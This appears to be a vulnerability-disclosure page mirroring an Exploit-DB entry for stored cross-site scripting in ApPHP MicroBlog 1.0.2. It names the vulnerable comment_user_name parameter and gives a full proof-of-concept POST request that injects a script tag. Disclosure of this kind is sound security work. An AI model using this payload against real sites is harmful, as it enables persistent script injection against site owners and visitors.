ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting

vendor:

MicroBlog

by:

Besim

8,8

CVSS

HIGH

Stored Cross Site Scripting

CWE

Product Name: MicroBlog

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: NO

Related CWE: N/A

CPE: a:apphp:microblog:1.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

ApPHP MicroBlog 1.0.2 – Stored Cross Site Scripting

ApPHP MicroBlog 1.0.2 is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code in the comment_user_name parameter of the vulnerable URL http://site_name/path/index.php?page=posts&post_id=. The malicious code is then stored in the database and is executed when the page is loaded.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database.

Source

Exploit-DB raw data:

# Exploit Title :              ApPHP MicroBlog 1.0.2  - Stored Cross
Site Scripting
# Author :                      Besim
# Google Dork :
# Date :                         12/10/2016
# Type :                         webapps
# Platform :                    PHP
# Vendor Homepage :   -
# Software link :            http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description : 

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############  POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment

############ ######################